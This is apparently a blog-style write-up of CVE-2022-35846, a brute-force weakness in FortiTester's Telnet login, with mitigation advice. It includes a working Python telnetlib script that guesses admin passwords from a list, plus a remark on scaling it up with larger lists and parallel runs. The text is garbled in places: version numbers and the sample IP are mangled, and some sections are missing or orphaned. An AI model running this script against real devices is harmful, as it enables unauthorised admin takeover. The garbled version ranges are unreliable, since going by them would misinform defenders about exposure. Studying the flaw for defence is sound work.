CVE-2022-35846 - Brute-Force Attack Vulnerability in FortiTester Telnet – What You Need to Know

---

Summary:  
CVE-2022-35846 is a serious vulnerability in Fortinet’s FortiTester appliance. Found specifically in the Telnet interface on multiple versions (from 2.3. up to 4.2., and from 7.. up to 7.1.), this bug allows a remote attacker to brute-force admin credentials because of improper restrictions on how many times someone can try logging in.

[References](#references)

---

What is CVE-2022-35846?

This vulnerability falls under CWE-307: Improper Restriction of Excessive Authentication Attempts. In plain English, this means the FortiTester device does NOT lock accounts or block connections after repeated failed login attempts on Telnet. Because of this, a remote attacker can just keep guessing passwords, making brute-force attacks very doable.

In short:  
Any attacker with network access to the Telnet port can basically try every possible password without being locked out.


---

Who is Affected?

You are affected if you are running any of the versions below and have the Telnet service enabled and exposed:

FortiTester 7.. through 7.1.

Note:  
These versions include many widely deployed FortiTester appliances.  
Refer to the official advisory for a full list.


---

Once the correct password is guessed, the attacker gets admin access.

Why is this bad?  
An attacker with admin access can control your FortiTester appliance, potentially altering test results, forwarding attacks, or using the device to pivot into the rest of your network.


---

Example Brute-Force Script

Below is a very basic proof-of-concept Python script using telnetlib to attempt login to a FortiTester device via Telnet. This is a demonstration and should only be used on equipment you own for testing.

import telnetlib

HOST = "192..2.10"    # Replace with your FortiTester IP
USER = "admin"
PWD_LIST = ["password1", "admin123", "test123", "letmein", "fortinet"]  # Sample passwords

for password in PWD_LIST:
    try:
        tn = telnetlib.Telnet(HOST, 23, timeout=5)
        tn.read_until(b"login: ")
        tn.write(USER.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(password.encode('ascii') + b"\n")
        output = tn.read_until(b"@", timeout=3)  # FortiTester prompt includes "@"
        if b"@" in output:
            print(f"[SUCCESS] Password found: {password}")
            tn.close()
            break
        else:
            print(f"[FAIL] Invalid password: {password}")
        tn.close()
    except Exception as e:
        print(f"[ERROR] {e}")

Note: A real attacker would use a much bigger password list and run this in parallel for more speed.


---

FortiTester 7.2. and above

See Fortinet’s advisory.

Monitor logs for failed login attempts.

---

References

- Fortinet Security Advisory - FG-IR-22-233
- NVD - CVE-2022-35846
- CWE-307: Improper Restriction of Excessive Authentication Attempts


In short:  
If you’re running an affected FortiTester version and have Telnet enabled, update immediately, disable Telnet, and make sure only trusted networks can connect to your administrative ports. This simple flaw can quickly become a big risk if left unchecked.

Timeline

Published on: 10/18/2022 14:15:00 UTC
Last modified on: 10/20/2022 19:03:00 UTC